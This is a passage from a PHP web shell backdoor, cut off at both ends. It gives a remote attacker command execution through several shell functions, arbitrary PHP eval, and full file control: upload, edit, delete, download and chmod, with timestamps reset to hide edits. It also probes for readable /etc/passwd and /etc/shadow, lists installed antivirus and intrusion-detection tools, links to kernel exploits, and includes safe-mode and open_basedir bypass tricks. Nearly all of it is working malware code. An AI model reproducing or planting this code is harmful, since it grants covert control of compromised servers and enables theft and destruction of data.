input,textarea,select{margin:0;color:#fff;background-color:#555;border:1px solid #df5; font:9pt Monospace,'Courier New'}
form{margin:0px}
#toolsTbl{text-align:center}
.toolsInp{width:300px}
.main th{text-align:left;background-color:#003300}
.main tr:hover{border:2px outset gray;;background-color:#5e5e5e}
.l1{background-color:#444}
.l2{background-color:#333}
pre{font-family:Courier,Monospace}
</style>
<script>
var c_='".htmlspecialchars($GLOBALS['cwd'])."';
var a_='".htmlspecialchars(@$_POST['a']) ."'
var charset_='".htmlspecialchars(@$_POST['charset']) ."';
var p1_='".((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
var p2_='".((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
var p3_='".((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
var d=document;
function set(a,c,p1,p2,p3,charset){
if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
}
function g(a,c,p1,p2,p3,charset){
set(a,c,p1,p2,p3,charset);
d.mf.submit();
}
function a(a,c,p1,p2,p3,charset){
set(a,c,p1,p2,p3,charset);
var params='ajax=true';
for(i=0;i<d.mf.elements.length;i++)
params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
sr('".addslashes($_SERVER['REQUEST_URI']) ."',params);
}
function sr(url,params){
if(window.XMLHttpRequest)
req=new XMLHttpRequest();
else if(window.ActiveXObject)
req=new ActiveXObject('Microsoft.XMLHTTP');
if(req){
req.onreadystatechange=processReqChange;
req.open('POST',url,true);
req.setRequestHeader ('Content-Type','application/x-www-form-urlencoded');
req.send(params);
}
}
function processReqChange(){
if((req.readyState==4))
if(req.status==200){
var reg=new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\",'m');
var arr=reg.exec(req.responseText);
eval(arr[2].substr(0,arr[1]));
}else alert('Request error!');
}
</script>
<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form>";
$freeSpace=@diskfreespace($GLOBALS['cwd']);
$totalSpace=@disk_total_space($GLOBALS['cwd']);
$totalSpace=$totalSpace?$totalSpace:1;
$release=@php_uname('r');
$kernel=@php_uname('s');
$explink='http://exploit-db.com/list.php?description=';
if(strpos('Linux',$kernel)!==false)
$explink .= urlencode('Linux Kernel '.substr($release,0,6));
else
$explink .= urlencode($kernel.' '.substr($release,0,3));
if(!function_exists('posix_getegid')){
$user=@get_current_user();
$uid=@getmyuid();
$gid=@getmygid();
$group="?";
}else {
$uid=@posix_getpwuid(posix_geteuid());
$gid=@posix_getgrgid(posix_getegid());
$user=$uid['name'];
$uid=$uid['uid'];
$group=$gid['name'];
$gid=$gid['gid'];
}

$cwd_links='';
$path=explode("/",$GLOBALS['cwd']);
$n=count($path);
for($i=0; $i<$n-1; $i++){
$cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
for($j=0; $j<=$i; $j++)
$cwd_links .= $path[$j].'/';
$cwd_links .= "\")'>".$path[$i]."/</a>";
}

$charsets=array('UTF-8','Windows-1251','KOI8-R','KOI8-U','cp866');
$opt_charsets='';
foreach($charsets as $item)
$opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';

$m=array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode');
if(!empty($GLOBALS['auth_pass']))
$m['Logout']='Logout';
$m['Self remove']='SelfRemove';
$menu='';
foreach($m as $k=>$v)
$menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';

$drives="";
if($GLOBALS['os']=='win'){
foreach(range('c','z') as $drive)
if(is_dir($drive.':\\'))
$drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
}
echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:'.($GLOBALS['os']=='win'?'<br>Drives:':'').'</span></td>'
.'<td><nobr>'.substr(@php_uname(),0,120).' <a href="'.$explink.'"
target=_blank>[exploit-db.com]</a></nobr><br>'.$uid.' ('.$user.') <span>
Group:</span> '.$gid.' ('.$group.')<br>'.@phpversion().'
<span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#00bb00><b>OFF</b></font>')
.' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>'.XViewSize($totalSpace).' <span>Free:</span> '.XViewSize($freeSpace).' ('. (int)
($freeSpace/$totalSpace*100).'%)<br>'.$cwd_links.' '. XPermsColor($GLOBALS['cwd']).' <a href=#
onclick="g(\'FilesMan\',\''.$GLOBALS
['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>'.$drives.'</td>'
.'<td width=1 align=right><nobr>
<select onchange="g(null,null,null,null,null,this.value)">
<optgroup label="Page charset">'.$opt_charsets.'</optgroup>
</select><br><span>Server IP:</span><br>'.@$_SERVER["SERVER_ADDR"].'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'
.'<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.'</tr>
</table><div style="margin:5">';
}

function XFooter(){
$is_writable=is_writable($GLOBALS['cwd'])?" <font color='#25ff00'>(Writeable)</font>":" <font
color=red>(Not writable)</font>";
echo "
</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%style='border-top:2px solid #333;border-bottom:2px solid #333;'>
<tr>
<td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='".htmlspecialchars($GLOBALS['cwd']) ."'>
<input type=submit value='>>'></form></td>
<td><form onsubmit=\"g('FilesTools',null,this.f.value);
return false;\">
<span>Read file:</span><br>
<input class='toolsInp' type=text name=f>
<input type=submit value='>>'></form></td>
</tr><tr>
<td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);
return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
<td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');
return false;\"><span>Make file:</span>$is_writable<br>
<input class='toolsInp' type=text name=f>
<input type=submit value='>>'></form></td>
</tr><tr>
<td><form onsubmit=\"g('Console',null,this.c.value);
return false;\"><span>Execute:</span>
<br><input
class='toolsInp' type=text name=c value=''>
<input type=submit value='>>'></form></td>
<td><form method='post' ENCTYPE='multipart/form-data'>
<input type=hidden name=a value='FilesMAn'>
<input type=hidden name=c value='".$GLOBALS['cwd'] ."'>
<input type=hidden name=p1 value='uploadFile'>
<input type=hidden name=charset value='".(isset($_POST['charset'])?$_POST['charset']:'')."'>
<span>Upload file:</span>$is_writable<br><input class='toolsInp'
type=file name=f>
<input type=submit value='>>'>
</form><br></td>
</tr></table></div></body></html>";
}

if(!function_exists("posix_getpwuid")&&(strpos($GLOBALS['disable_functions'],'posix_getpwuid')===false)){
function posix_getpwuid($p){return false;}}
if(!function_exists("posix_getgrgid")&&(strpos($GLOBALS['disable_functions'],'posix_getgrgid')===false)){
function posix_getgrgid($p){return false;}}

function XEx($in){
$out='';
if(function_exists('exec')){
@exec($in,$out);
$out=@join("\n",$out);
}elseif(function_exists('passthru')){
ob_start();
@passthru($in);
$out=ob_get_clean();
}elseif(function_exists('system')){
ob_start();
@system($in);
$out=ob_get_clean();
}elseif(function_exists('shell_exec')){
$out=shell_exec($in);
}elseif(is_resource($f=@popen($in,"r"))){
$out="";
while(!@feof($f))
$out .= fread($f,1024);
pclose($f);
}
return $out;
}
function XViewSize($s){
if($s >= 1073741824)
return sprintf('%1.2f',$s / 1073741824). ' GB';
elseif($s >= 1048576)
return sprintf('%1.2f',$s / 1048576).' MB';
elseif($s >= 1024)
return sprintf('%1.2f',$s / 1024).' KB';
else
return $s.' B';
}

function XPerms($p){
if(($p & 0xC000)==0xC000)$i='s';
elseif(($p & 0xA000)==0xA000)$i='l';
elseif(($p & 0x8000)==0x8000)$i='-';
elseif(($p & 0x6000)==0x6000)$i='b';
elseif(($p & 0x4000)==0x4000)$i='d';
elseif(($p & 0x2000)==0x2000)$i='c';
elseif(($p & 0x1000)==0x1000)$i='p';
else $i='u';
$i .= (($p & 0x0100)?'r':'-');
$i .= (($p & 0x0080)?'w':'-');
$i .= (($p & 0x0040)?(($p & 0x0800)?'s':'x'):(($p & 0x0800)?'S':'-'));
$i .= (($p & 0x0020)?'r':'-');
$i .= (($p & 0x0010)?'w':'-');
$i .= (($p & 0x0008)?(($p & 0x0400)?'s':'x'):(($p & 0x0400)?'S':'-'));
$i .= (($p & 0x0004)?'r':'-');
$i .= (($p & 0x0002)?'w':'-');
$i .= (($p & 0x0001)?(($p & 0x0200)?'t':'x'):(($p & 0x0200)?'T':'-'));
return $i;
}

function XPermsColor($f){
if(!@is_readable($f))
return '<font color=#FF0000>'.XPerms(@fileperms($f)).'</font>';
elseif(!@is_writable($f))
return '<font color=white>'.XPerms(@fileperms($f)).'</font>';
else
return '<font color=#25ff00>'.XPerms(@fileperms($f)).'</font>';
}

if(!function_exists("scandir")){
function scandir($dir){
$dh= opendir($dir);
while (false!==($filename=readdir($dh)))
$files[]=$filename;
return $files;
}
}

function XWhich($p){
$path=XEx('which '.$p);
if(!empty($path))
return $path;
return false;
}

function actionSecInfo(){
XHeader();
echo '<h1>Server security information</h1><div class=content>';
function XSecParam($n,$v){
$v=trim($v);
if($v){
echo '<span>'.$n.': </span>';
if(strpos($v,"\n") === false)
echo $v.'<br>';
else
echo '<pre class=ml1>'.$v.'</pre>';
}
}

XSecParam('Server software',@getenv('SERVER_SOFTWARE'));
if(function_exists('apache_get_modules'))
XSecParam('Loaded Apache modules',implode(',',apache_get_modules()));
XSecParam('Disabled PHP Functions',
$GLOBALS['disable_functions']?
$GLOBALS['disable_functions']:'none');
XSecParam('Open base dir',@ini_get('open_basedir'));
XSecParam('Safe mode exec dir',@ini_get('safe_mode_exec_dir'));
XSecParam('Safe mode include dir',@ini_get('safe_mode_include_dir'));
XSecParam('cURL support',function_exists('curl_version')?'enabled':'no');
$temp=array();
if(function_exists('mysql_get_client_info'))
$temp[]="MySql (".mysql_get_client_info().")";
if(function_exists('mssql_connect'))
$temp[]="MSSQL";
if(function_exists('pg_connect'))
$temp[]="PostgreSQL";
if(function_exists('oci_connect'))
$temp[]="Oracle";
XSecParam('Supported databases',implode(',',$temp));
echo '<br>';

if($GLOBALS['os']=='nix'){
XSecParam('Readable /etc/passwd',@is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\",\"/etc/\",\"passwd\")'>[view]</a>":'no');
XSecParam('Readable /etc/shadow',@is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\",\"etc\",\"shadow\")'>[view]</a>":'no');
XSecParam('OS version',@file_get_contents('/proc/version'));
XSecParam('Distr name',@file_get_contents('/etc/issue.net'));
if(!$GLOBALS['safe_mode']){
$userful=array('gcc','lcc','cc','ld','make','php','perl',
'python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
$danger=array('kav','nod32','bdcored','uvscan','sav','drwebd',
'clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc',
'portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch',
'sysmask','zmbscap','sawmill','wormscan','ninja');
$downloaders=array('wget','fetch','lynx','links','curl','get','lwp-mirror');
echo '<br>';
$temp=array();
foreach ($userful as $item)
if(XWhich($item))
$temp[]=$item;
XSecParam('Userful',implode(',',$temp));
$temp=array();
foreach ($danger as $item)
if(XWhich($item))
$temp[]=$item;
XSecParam('Danger',implode(',',$temp));
$temp=array();
foreach ($downloaders as $item)
if(XWhich($item))
$temp[]=$item;
XSecParam('Downloaders',implode(',',$temp));
echo '<br/>';
XSecParam('HDD space',XEx('df -h'));
XSecParam('Hosts',@file_get_contents('/etc/hosts'));
}
}else {
XSecParam('OS Version',XEx('ver'));
XSecParam('Account Settings',XEx('net accounts'));
XSecParam('User Accounts',XEx('net user'));
}
echo '</div>';
XFooter();
}

function actionPhp(){
if(isset($_POST['ajax'])){
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']=true;
ob_start();
eval($_POST['p1']);
$temp="document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
echo strlen($temp),"\n",$temp;
exit;
}
XHeader();
if(isset($_POST['p2'])&&($_POST['p2']=='info')){
echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>';
ob_start();
phpinfo();
$tmp=ob_get_clean();
$tmp=preg_replace('!(body|a:\w+|body,td,th,h1,h2){.*}!msiU','',$tmp);
$tmp=preg_replace('!td,th {(.*)}!msiU','.e,.v,.h,.h th {$1}',$tmp);
echo str_replace('<h1','<h2',$tmp) .'</div><br>';
}
if(empty($_POST['ajax'])&&!empty($_POST['p1']))
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']=false;
echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
echo ' <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
if(!empty($_POST['p1'])){
ob_start();
eval($_POST['p1']);
echo htmlspecialchars(ob_get_clean());
}
echo '</pre></div>';
XFooter();
}

function actionFilesMan(){
XHeader();
echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>';
if(!empty($_POST['p1'])){
switch($_POST['p1']){
case 'uploadFile':
if(!@move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']))
echo "Can't upload file!";
break;
case 'mkdir':
if(!@mkdir($_POST['p2']))
echo "Can't create new dir";
break;
case 'delete':
function deleteDir($path){
$path=(substr($path,-1)=='/')?$path:$path.'/';
$dh= opendir($path);
while (($item=readdir($dh))!==false){
$item=$path.$item;
if((basename($item)=="..")||(basename($item)=="."))
continue;
$type=filetype($item);
if($type=="dir")
deleteDir($item);
else
@unlink($item);
}
closedir($dh);
@rmdir($path);
}
if(is_array(@$_POST['f']))
foreach($_POST['f'] as $f){
if($f=='..')
continue;
$f=urldecode($f);
if(is_dir($f))
deleteDir($f);
else
@unlink($f);
}
break;
case 'paste':
if($_SESSION['act']=='copy'){
function copy_paste($c,$s,$d){
if(is_dir($c.$s)){
mkdir($d.$s);
$h=@opendir($c.$s);
while (($f=@readdir($h))!==false)
if(($f!=".") and ($f!=".."))
copy_paste($c.$s.'/',$f,$d.$s.'/');
}elseif(is_file($c.$s))
@copy($c.$s,$d.$s);
}
foreach($_SESSION['f'] as $f)
copy_paste($_SESSION['c'],$f,$GLOBALS['cwd']);
}elseif($_SESSION['act']=='move'){
function move_paste($c,$s,$d){
if(is_dir($c.$s)){
mkdir($d.$s);
$h=@opendir($c.$s);
while (($f=@readdir($h))!==false)
if(($f!=".") and ($f!=".."))
copy_paste($c.$s.'/',$f,$d.$s.'/');
}elseif(@is_file($c.$s))
@copy($c.$s,$d.$s);
}
foreach($_SESSION['f'] as $f)
@rename($_SESSION['c'].$f,$GLOBALS['cwd'].$f);
}elseif($_SESSION['act']=='zip'){
if(class_exists('ZipArchive')){
$zip=new ZipArchive();
if($zip->open($_POST['p2'],1)){
chdir($_SESSION['c']);
foreach($_SESSION['f'] as $f){
if($f=='..')
continue;
if(@is_file($_SESSION['c'].$f))
$zip->addFile($_SESSION['c'].$f,$f);
elseif(@is_dir($_SESSION['c'].$f)){
$iterator=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'));
foreach ($iterator as $key=>$value){
$zip->addFile(realpath($key),$key);
}
}
}
chdir($GLOBALS['cwd']);
$zip->close();
}
}
}elseif($_SESSION['act']=='unzip'){
if(class_exists('ZipArchive')){
$zip=new ZipArchive();
foreach($_SESSION['f'] as $f){
if($zip->open($_SESSION['c'].$f)){
$zip->extractTo($GLOBALS['cwd']);
$zip->close();
}
}
}
}elseif($_SESSION['act']=='tar'){
chdir($_SESSION['c']);
$_SESSION['f']=array_map('escapeshellarg',$_SESSION['f']);
XEx('tar cfzv '.escapeshellarg($_POST['p2']).' '.implode(' ',$_SESSION['f']));
chdir($GLOBALS['cwd']);
}
unset($_SESSION['f']);
break;
default:
if(!empty($_POST['p1'])){
$_SESSION['act']=@$_POST['p1'];
$_SESSION['f']=@$_POST['f'];
foreach($_SESSION['f'] as $k=>$f)
$_SESSION['f'][$k]=urldecode($f);
$_SESSION['c']=@$_POST['c'];
}
break;
}
}
$dirContent=@scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
if($dirContent === false){echo 'Can\'t open this folder!';XFooter(); return; }
global $sort;
$sort=array('name',1);
if(!empty($_POST['p1'])){
if(preg_match('!s_([A-z]+)_(\d{1})!',$_POST['p1'],$match))
$sort=array($match[1],(int)$match[2]);
}
echo "<script>
function sa(){
for(i=0;i<d.files.elements.length;i++)
if(d.files.elements[i].type=='checkbox')
d.files.elements[i].checked=d.files.elements[0].checked;
}
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a
href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#'
onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a
href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a>
</th><th>Actions</th></tr>";
$dirs=$files=array();
$n=count($dirContent);
for($i=0;$i<$n;$i++){
$ow=@posix_getpwuid(@fileowner($dirContent[$i]));
$gr=@posix_getgrgid(@filegroup($dirContent[$i]));
$tmp=array('name'=>$dirContent[$i],
 'path'=>$GLOBALS['cwd'].$dirContent[$i],
 'modify'=>date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),
 'perms'=>XPermsColor($GLOBALS['cwd'].$dirContent[$i]),
 'size'=>@filesize($GLOBALS['cwd'].$dirContent[$i]),
 'owner'=>$ow['name']?$ow['name']:@fileowner($dirContent[$i]),
 'group'=>$gr['name']?$gr['name']:@filegroup($dirContent[$i])
);
if(@is_file($GLOBALS['cwd'].$dirContent[$i]))
$files[]=array_merge($tmp,array('type'=>'file'));
elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))
$dirs[]=array_merge($tmp,array('type'=>'link','link'=>readlink($tmp['path'])));
elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i]!="."))
$dirs[]=array_merge($tmp,array('type'=>'dir'));
}
$GLOBALS['sort']=$sort;
function XCmp($a,$b){
if($GLOBALS['sort'][0]!='size')
return strcmp(strtolower($a[$GLOBALS['sort'][0]]),strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
else
return (($a['size'] < $b['size'])?-1:1)*($GLOBALS['sort'][1]?1:-1);
}
usort($files,"XCmp");
usort($dirs,"XCmp");
$files=array_merge($dirs,$files);
$l=0;
foreach($files as $f){
echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');"
title='.$f['link'].'><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td>
<td>'.(($f['type']=='file')?XViewSize($f['size']):$f['type']).'</td>
<td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td>
<td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
.'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode
($f['name']).'\',\'edit\')">E</a>
<a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'download\')">D</a>':'').'</td></tr>';
$l=$l?0:1;
}
echo "<tr><td colspan=7>
<input type=hidden name=a value='FilesMan'>
<input type=hidden name=c value='".htmlspecialchars($GLOBALS['cwd']) ."'>
<input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
<select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
if(class_exists('ZipArchive'))
echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";
echo "<option value='tar'>Compress (tar.gz)</option>";
if(!empty($_SESSION['act'])&&@count($_SESSION['f']))
echo "<option value='paste'>Paste / Compress</option>";
echo "</select>&nbsp;";
if(!empty($_SESSION['act'])&&@count($_SESSION['f'])&&(($_SESSION['act']=='zip')||($_SESSION['act']=='tar')))
echo "file name: <input type=text name=p2 value='X_".date("Ymd_His").".".($_SESSION['act']=='zip'?'zip':'tar.gz')."'>&nbsp;";
echo "<input type='submit' value='>>'></td></tr></form></table></div>";
XFooter();
}

function actionFilesTools(){
if(isset($_POST['p1']))
$_POST['p1']=urldecode($_POST['p1']);
if(@$_POST['p2']=='download'){
if(@is_file($_POST['p1'])&&@is_readable($_POST['p1'])){
ob_start("ob_gzhandler",4096);
header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
if(function_exists("mime_content_type")){
$type=@mime_content_type($_POST['p1']);
header("Content-Type: ".$type);
}else
header("Content-Type: application/octet-stream");
$fp=@fopen($_POST['p1'],"r");
if($fp){
while(!@feof($fp))
echo @fread($fp,1024);
fclose($fp);
}
}exit;
}
if(@$_POST['p2']=='mkfile'){
if(!file_exists($_POST['p1'])){
$fp=@fopen($_POST['p1'],'w');
if($fp){
$_POST['p2']="edit";
fclose($fp);
}
}
}
XHeader();
echo '<h1>File tools</h1><div class=content>';
if(!file_exists(@$_POST['p1'])){
echo 'File not exists';
XFooter();
return;
}
$uid=@posix_getpwuid(@fileowner($_POST['p1']));
if(!$uid){
$uid['name']=@fileowner($_POST['p1']);
$gid['name']=@filegroup($_POST['p1']);
}else $gid=@posix_getgrgid(@filegroup($_POST['p1']));
echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?XViewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.XPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime
($_POST['p1'])).'
<span>Access time:</span>
'.date('Y-m-d H:i:s',fileatime($_POST['p1'])).'
<span>Modify time:</span>
 '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
if(empty($_POST['p2']))
$_POST['p2']='view';
if(is_file($_POST['p1']))
$m=array('View','Highlight','Download','Hexdump','Edit','Chmod','Rename','Touch');
else
$m=array('Chmod','Rename','Touch');
foreach($m as $v)
echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]
</b>':$v).'</a> ';
echo '<br><br>';
switch($_POST['p2']){
case 'view':
echo '<pre class=ml1>';
$fp=@fopen($_POST['p1'],'r');
if($fp){
while(!@feof($fp))
echo htmlspecialchars(@fread($fp,1024));
@fclose($fp);
}
echo '</pre>';
break;
case 'highlight':
if(@is_readable($_POST['p1'])){
echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
$code=@highlight_file($_POST['p1'],true);
echo str_replace(array('<span ','</span>'),array('<font ','</font>'),$code).'</div>';
}
break;
case 'chmod':
if(!empty($_POST['p3'])){
$perms=0;
for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
$perms += (int)$_POST['p3'][$i]*pow(8,(strlen($_POST['p3'])-$i-1));
if(!@chmod($_POST['p1'],$perms))
echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
}
clearstatcache();
echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o',fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
break;
case 'edit':
if(!is_writable($_POST['p1'])){
echo 'File isn\'t writeable';
break;
}
if(!empty($_POST['p3'])){
$time=@filemtime($_POST['p1']);
$_POST['p3']=substr($_POST['p3'],1);
$fp=@fopen($_POST['p1'],"w");
if($fp){
@fwrite($fp,$_POST['p3']);
@fclose($fp);
echo 'Saved!<br><script>p3_="";</script>';
@touch($_POST['p1'],$time,$time);
}
}
echo '<form onsubmit="g(null,null,null,null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
$fp=@fopen($_POST['p1'],'r');
if($fp){
while(!@feof($fp))
echo htmlspecialchars(@fread($fp,1024));
@fclose($fp);
}
echo '</textarea><input type=submit value=">>"></form>';
break;
case 'hexdump':
$c=@file_get_contents($_POST['p1']);
$n=0;
$h=array('00000000<br>','','');
$len=strlen($c);
for ($i=0; $i<$len; ++$i){
$h[1] .= sprintf('%02X',ord($c[$i])).' ';
switch (ord($c[$i])){
case 0:$h[2] .= ' '; break;
case 9:$h[2] .= ' '; break;
case 10: $h[2] .= ' '; break;
case 13: $h[2] .= ' '; break;
default: $h[2] .= $c[$i]; break;
}
$n++;
if($n==32){
$n=0;
if($i+1 < $len){$h[0] .= sprintf('%08X',$i+1).'<br>';}
$h[1] .= '<br>';
$h[2] .= "\n";
}
 }
echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222>
<tr><td bgcolor=#333333>
<span style="font-weight:
normal;"><pre>'.$h[0].'</pre>
</span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td
bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
break;
case 'rename':
if(!empty($_POST['p3'])){
if(!@rename($_POST['p1'],$_POST['p3']))
echo 'Can\'t rename!<br>';
else
die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
}
echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
break;
case 'touch':
if(!empty($_POST['p3'])){
$time=strtotime($_POST['p3']);
if($time){
if(!touch($_POST['p1'],$time,$time))
echo 'Fail!';
else
echo 'Touched!';
}else echo 'Bad time format!';
}
clearstatcache();
echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date
("Y-m-d H:i:s",@filemtime($_POST['p1'])).'">
<input type=submit value=">>"></form>';
break;
}
echo '</div>';
XFooter();
}

function actionSafeMode(){
$temp='';
ob_start();
switch($_POST['p1']){
case 1:
$temp=@tempnam($test,'cx');
if(@copy("compress.zlib://".$_POST['p2'],$temp)){
echo @file_get_contents($temp);
unlink($temp);
}else
echo 'Sorry... Can\'t open file';
break;
case 2:
$files=glob($_POST['p2'].'*');
if(is_array($files))
foreach ($files as $filename)
echo $filename."\n";
break;
case 3:
$ch=curl_init("file://".$_POST['p2']."\x00".preg_replace('!\(\d+\)\s.*!','',__FILE__));
curl_exec($ch);
break;
case 4:
ini_restore("safe_mode");
ini_restore("open_basedir");
include($_POST['p2']);
break;
case 5:
for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++){
$uid=@posix_getpwuid($_POST['p2']);
if($uid)
echo join(':',$uid)."\n";
}
break;
}
$temp=ob_get_clean();
XHeader();
echo '<h1>Safe mode bypass</h1><div class=content>';
echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'>
<input type=text name=param><input type=submit value=">>">
</form><br><span>Posix_getpwuid ("Read" /etc/passwd)
